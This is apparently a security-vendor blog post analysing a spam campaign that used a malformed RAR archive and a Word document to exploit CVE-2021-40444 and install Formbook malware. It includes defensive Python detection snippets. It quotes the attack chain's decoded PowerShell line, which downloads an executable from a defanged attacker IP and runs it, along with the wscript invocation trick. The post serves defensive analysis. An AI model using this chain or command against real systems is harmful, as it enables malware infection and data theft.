[Update (2021-12-23 1:00pm EST): A previous version of this story stated that the malformed RAR archive could not be opened in an earlier build of the WinRAR archiver. We have updated the story to explain how the RAR5 standard has changed and that WinRAR and other archiving tools now treat data preceding the Rar! magic bytes as if the archive contained self-extracting code. We have also tested the exploit on a testbed that has had the September, 2021 Cumulative Update, and while the Word document still was able to make a connection attempt, the remainder of the attack would not have completed due to the patch. We are unable to fully test this, because the malicious website hosting the exploit code has been shut down. We have added the label “[Updated]” to paragraphs that have been corrected. We apologize for giving a misleading impression that the exploit fully functions on a computer with the September (or later) Cumulative Updates installed.]
[Update (2021-12-23 10:00am EST): an earlier version of this post suggested the CAB-less exploit shown here works on systems that have the September 2021 patch for CVE-2021-40444. That is not the case; the patch corrected the issue. The attack was only successful on unpatched Windows systems. Thanks to Mitja Kolsek of ACROS Security and Will Dormann at CERT/CC for pointing out the error.]
Back in September, Microsoft published a series of mitigation steps and released a patch for a serious bug (designated CVE-2021-40444) in the Office suite of products. Criminals began exploiting the Microsoft MSHTML Remote Code Execution Vulnerability at least a week before September’s Patch Tuesday, but the early mitigations (which involved disabling the installation of ActiveX controls) and the patch (released a week later) were mostly successful at stopping the exploits that criminals had been attempting to leverage to install malware.
Soon after Microsoft published these solutions, attackers morphed the attack in an attempt to get around the patch’s protection.
Between October 24 and 25, we received a small number of spam email samples that contained weaponized file attachments. The attachments represent an escalation of the attacker’s abuse of the -40444 bug and demonstrate that even a patch can’t always mitigate the actions of a motivated and sufficiently skilled attacker.
Each of the messages shared the same body content, FROM: address, and malicious attachment.
In the initial versions of CVE-2021-40444 exploits, a malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file. When Microsoft’s patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive. Because it doesn’t actually use the CAB-style attack method, we’ve called it the CAB-less 40444 exploit. However, while it may have evaded mitigations that focused on the CAB-style attack on systems without the September patch, the changes in the September patch block the behavior described below.
How the attack transpired
Over a period of a bit more than a day, the attackers sent out spam emails that looked like this one. The only viable samples we received came in messages with an identical message body and From: address. The message body contained two street addresses in Hungary, but the From: address used a domain that was slightly different from that of a real business based in Jamaica, seemingly unconnected to the attack.
Attached to the message was an archive file named Profile.rar. RAR archives are not unique or unusual as malicious file attachments, but this one had been malformed. Prepended to the RAR file was a script written in Windows Scripting Host notation, with the malicious Word document immediately following the script text.
[Updated] WinRAR (and some other compression utilities) treat any data preceding the “Rar!” header of a RAR file (shown in the image below) as self-extracting archive code, but do no other checking of that data, such as determining that it is, in fact, self-extracting archive code. Archiving utilities that support self-extracting archives would therefore still be able to decompress this file.
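The idea of data sitting in front of the “Rar!” magic bytes can be checked with a few lines of Python. This is a minimal sketch, not the logic WinRAR itself uses: it simply searches for the RAR 4.x and RAR 5.0 signatures and reports how many bytes precede the first one. The function name rar_prefix_length and the sample bytes are hypothetical.

```python
from typing import Optional

# Published RAR signatures: "Rar!" followed by a short version marker.
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"


def rar_prefix_length(data: bytes) -> Optional[int]:
    """Return the number of bytes before the first RAR signature.

    Returns 0 for an ordinary archive, a positive number when something
    (self-extractor code, or a script) has been prepended, and None when
    no RAR signature is present at all.
    """
    offsets = [data.find(magic) for magic in (RAR5_MAGIC, RAR4_MAGIC)]
    offsets = [offset for offset in offsets if offset >= 0]
    return min(offsets) if offsets else None


if __name__ == "__main__":
    # Hypothetical stand-in for a script prepended to an archive.
    sample = b"<job>placeholder script text</job>" + RAR5_MAGIC + b"\x00" * 8
    print(rar_prefix_length(sample))
```

A nonzero result on a file that is not a Windows executable is a reasonable signal that the prefix deserves a closer look, although a plain byte search like this can be fooled by a prefix that itself contains the signature bytes.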
[Updated] If a user decompresses this malicious RAR attachment and then opens the Word document, the exploit triggers.
In a tool like Process Explorer, shown below, the Word document appears to invoke the RAR archive itself as though it were a Windows Scripting Host (WSH) script, a weird sort of circular reference that (in theory) shouldn’t work, but does. Windows allows these kinds of scripts to mix together other scripting formats. Process Explorer shows the command line as wscript.exe “.wsf:../../../[path where RAR was saved]/Profile.rar?.wsf”. Because the text of the script appears before the magic bytes of the archive, the Windows Scripting Host process wscript.exe successfully invokes the embedded PowerShell command in the RAR file.
That PowerShell command decodes a long string of base64-encoded text, which is itself a separate scripting command that instructs PowerShell to retrieve a malware executable from a remote website, and run it on the system as dllhostSvc.exe.
Why does this work?
[Updated] In theory, this attack just shouldn’t work. For systems that had the September update, it doesn’t. But in the timeframe of the attack, some systems may not have been patched yet. It also worked because the compression utility treated the file as a self-extracting archive.
As with previous exploits against the -40444 bug, the attackers used an Office document that contains an OLE Object (a mechanism to embed external files or documents), which in a non-malicious document might be used to view or download a web page with JavaScript. But buried in the weaponized .docx (which is just a zipped collection of XML files), inside a file named “word/_rels/document.xml.rels,” the attackers embedded a line of code in the MHTML protocol handler that looked like this.
The attackers knew that some security vendors might detect the plain text of a URL, so they encoded it with XML character entity references. The value of &#x48; above declares a hex value of 48, which in ASCII is the letter H; &#x54; represents an ASCII T, and &#x50; is P: the first letters in the familiar http:// protocol header in a URL.
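To illustrate how character entity references hide a URL from a plain-text search, the sketch below decodes them with Python’s standard html.unescape function. The encoded string and the example.invalid host are made up for the demonstration and are not the attackers’ actual relationship target.

```python
import html


def decode_entities(target: str) -> str:
    """Resolve numeric character references such as &#x48; (hex 48, 'H')."""
    return html.unescape(target)


if __name__ == "__main__":
    # Hypothetical encoded value: the scheme is written entirely as entities.
    encoded = "&#x48;&#x54;&#x54;&#x50;&#x3a;&#x2f;&#x2f;example.invalid/page.html"
    print("http" in encoded.lower())                    # plain-text search misses it
    print("http" in decode_entities(encoded).lower())   # decoded text reveals it
```

A scanner that normalizes entity references before matching URL patterns would not be fooled by this kind of encoding.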
While there is no VBA or macro in the document that can execute, the attacker prompted the user to “enable content” in the body of the Word document. Doing so triggers the computer to load a page at hxxp://104.244.78.177/Profile.html (obfuscation intentional).
[Updated] In a test of this functionality on a testbed on which the September update had been applied, Word attempts to contact the remote website before the program displays the document. It is not possible to test whether the full attack would be successful now, because the website hosting the malicious code has been offline for several weeks.
When we navigated to that page (when it was still live) in a browser, we only saw an Apache welcome page:
However, when we looked more closely at the source code of that page, there was some unusual, obfuscated JavaScript code there.
[Updated] The JavaScript on the page would be executed within Office on an unpatched system. The patch would have blocked the installation of any ActiveX controls in the context of Microsoft Word. The script used was an obfuscated version of the JavaScript already published in a proof-of-concept for this technique to launch that original RAR file as a WSF.
Once the file is found, wscript.exe will run the WSF code, which in turn launches PowerShell. As mentioned previously, the attack uses a base64 encoded PowerShell command. Decoding that reveals the final stage of exploitation:
iex ((new-object system.net.webclient).downloadfile("hxxp://104.244.78.177/abb01.exe","$env:LOCALAPPDATA\dllhostSvc.exe"));Start-Process "$env:LOCALAPPDATA\dllhostSvc.exe"
This resulted in the computer downloading a malicious file into “AppData\Local” and launching it. The Labs team later confirmed that this EXE was a sample of a malware family called Formbook.
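The decoding step described above can be reproduced safely in Python without running anything. This is a sketch under one assumption: we do not state here how the sample’s text was encoded, so the helper (a hypothetical name, decode_powershell_blob) guesses between UTF-16LE, which PowerShell’s -EncodedCommand option expects, and UTF-8.

```python
import base64


def decode_powershell_blob(blob: str) -> str:
    """Decode base64 text to a readable command string without executing it."""
    raw = base64.b64decode(blob)
    # ASCII text stored as UTF-16LE has a zero byte after every character,
    # so many zero bytes at odd offsets suggest UTF-16LE. Otherwise use UTF-8.
    looks_utf16 = len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    if looks_utf16:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Benign, made-up command used only to exercise the decoder.
    command = 'Write-Output "hello"'
    blob = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    print(decode_powershell_blob(blob))
```

Decoding offline like this lets an analyst read the URL and file path in the command while the script itself never runs.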
Noisy over the network
This attack was particularly noisy from a network perspective.
The JavaScript that runs on the Profile.html page creates a somewhat bizarre series of network requests. Because the JavaScript deobfuscates itself as it runs, there is a noticeable delay in the execution of the script: the infection process takes from five to eight seconds to complete and generates distinctive network traffic along the way.
The script running on Profile.html triggers the computer to make multiple requests to the page using different HTTP request “verbs” – not only the typical GET request, but also HEAD, OPTIONS, and PROPFIND. It’s this last HTTP request type that’s of interest not only because it’s unusual, but because the purpose of that request type is for XML documents to request web-based resources – exactly what the exploit does.
At the end of this process, the script triggers Word to run the Windows Script Host, pointing it at the .rar file. The script invokes PowerShell, which (eventually) downloads the Formbook payload. Notably, while the other HTTP requests in this process all have User-Agent strings, the final request that delivers the malware executable does not. The User-Agents that do get used during these requests make no sense: some of the requests pretend to be from an Internet Explorer 7 browser running on a version of Windows 8 that’s five years past its best-by date, and others appear to use the User-Agent string of Microsoft Office Existence Discovery.
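The request pattern described above lends itself to a simple log check. The sketch below is one possible heuristic, not a Sophos detection rule: it flags a client and server pair when the client has sent HEAD, OPTIONS, and PROPFIND requests to the server and has also fetched an .exe file with no User-Agent header. The HttpRecord type, its field names, and the sample addresses are assumptions about how proxy logs might be represented.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass
class HttpRecord:
    """Hypothetical shape of one parsed proxy or firewall log entry."""
    client: str
    host: str
    method: str
    path: str
    user_agent: Optional[str]


PROBE_METHODS = {"HEAD", "OPTIONS", "PROPFIND"}


def suspicious_pairs(records: Iterable[HttpRecord]) -> List[Tuple[str, str]]:
    """Return (client, host) pairs that show both halves of the pattern."""
    methods_seen = defaultdict(set)
    bare_exe_fetch = set()
    for record in records:
        key = (record.client, record.host)
        method = record.method.upper()
        methods_seen[key].add(method)
        # An executable download that carries no User-Agent header at all.
        if method == "GET" and record.path.lower().endswith(".exe") and not record.user_agent:
            bare_exe_fetch.add(key)
    return sorted(key for key in bare_exe_fetch if PROBE_METHODS <= methods_seen[key])


if __name__ == "__main__":
    ua = "Microsoft Office Existence Discovery"
    log = [
        HttpRecord("10.0.0.5", "203.0.113.7", "OPTIONS", "/", ua),
        HttpRecord("10.0.0.5", "203.0.113.7", "HEAD", "/page.html", ua),
        HttpRecord("10.0.0.5", "203.0.113.7", "PROPFIND", "/", ua),
        HttpRecord("10.0.0.5", "203.0.113.7", "GET", "/payload.exe", None),
    ]
    print(suspicious_pairs(log))
```

Requiring both conditions keeps the check narrow; either one alone (an Office client probing a WebDAV share, or a tool downloading an installer without a User-Agent) is common in benign traffic.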
As for the malware payload itself, Formbook is an extremely noisy customer. The malware communicated with more than 50 servers over the course of about 18 hours, generating a huge number of web requests that were also distinctive in that the bot connected to a URL with the string /zxsc/ in the URI path on each server, and without a User-Agent in the request header. It made many HTTP connections per minute following this pattern, which would be extremely obvious to anyone monitoring the network for unusually high volumes of anomalous activity. But many don’t.
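For anyone who does monitor their network, the beaconing behavior is easy to express as a query. The following sketch counts, per client, how many distinct servers received a request whose path contains /zxsc/ and that carried no User-Agent. The tuple layout and the min_hosts threshold of 10 are illustrative assumptions; only the /zxsc/ marker and the missing User-Agent come from our observations.

```python
from collections import defaultdict
from typing import Dict, Iterable, Optional, Tuple

# Each entry: (client address, server host, URI path, User-Agent or None).
Request = Tuple[str, str, str, Optional[str]]


def beaconing_clients(
    requests: Iterable[Request],
    marker: str = "/zxsc/",
    min_hosts: int = 10,
) -> Dict[str, int]:
    """Map each noisy client to the number of distinct servers it contacted."""
    hosts_by_client = defaultdict(set)
    for client, host, path, user_agent in requests:
        if marker in path and not user_agent:
            hosts_by_client[client].add(host)
    return {
        client: len(hosts)
        for client, hosts in hosts_by_client.items()
        if len(hosts) >= min_hosts
    }


if __name__ == "__main__":
    # Made-up traffic: one client contacting a dozen servers with the marker path.
    traffic = [("10.0.0.5", f"host{i}.example", "/zxsc/?id=1", None) for i in range(12)]
    print(beaconing_clients(traffic))
```

Counting distinct servers, and not raw request volume, keeps a single chatty but legitimate connection from triggering the check.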
Patching quickly when exploits strike
This modified exploit disappeared after only a day in use, likely because the September patch kept its success rate low.
[Updated] One thing that we noticed in the course of this investigation is that the older version of WinRAR on the test system could not function with these modified rar archive files. Recent editions of the program did not have this problem. When we originally tested this on a testbed machine, the version of WinRAR installed on it (3.61) could not open the archive, throwing an error.
[Updated] When we contacted the developers of the WinRAR archiving program, they explained that this particular version of WinRAR would not have supported the RAR5 self-extracting archive format, which is probably the reason why it reported the error message. When we installed the newest available build of WinRAR (6.10 beta 3), it was able to successfully open and extract the maldoc from the archive file.
[Updated] So, unexpectedly, in this case, users of this specific, much older, outdated version of WinRAR would not have been able to unpack the archive, though not as a result of any deliberate effort.
[Updated] While that’s clearly unusual behavior, we wouldn’t recommend that you downgrade to an unsupported version of an archiver utility just because it broke this edge-case attack. Our conventional advice still applies here: When Microsoft publishes warnings about exploits being used “in the wild,” this is what they mean. Someone, or some group of people, was already using this exploit in a spam campaign, implementing it as soon as they discovered the technique and could turn it into an operational campaign.
But patching alone cannot prevent all vulnerabilities, in every case. Enabling all the restrictions that would prevent a user from accidentally triggering a maldoc helps somewhat, but people can be (and frequently are) fooled into clicking that “Enable content” button. Learning that doing this is, generally, a bad idea isn’t hard, but it needs to be reinforced. Training yourself to be reflexively suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies you don’t know, sounds like a simple thing, but it takes practice to recognize when something’s amiss. Learn to trust your instincts and check with the sender (or a knowledgeable person in the IT team) if you run into something like this – preferably before opening it.
Detection guidance
Sophos endpoint products will detect the weaponized document files that contain the CAB-less -40444 exploit as Troj/DocDL-AEOL; Sophos endpoint products generically detect Formbook malware based on longstanding static analysis rules. We’ve published indicators relating to samples investigated in this report on the SophosLabs GitHub page and updated it with additional IOCs including the Profile.html page.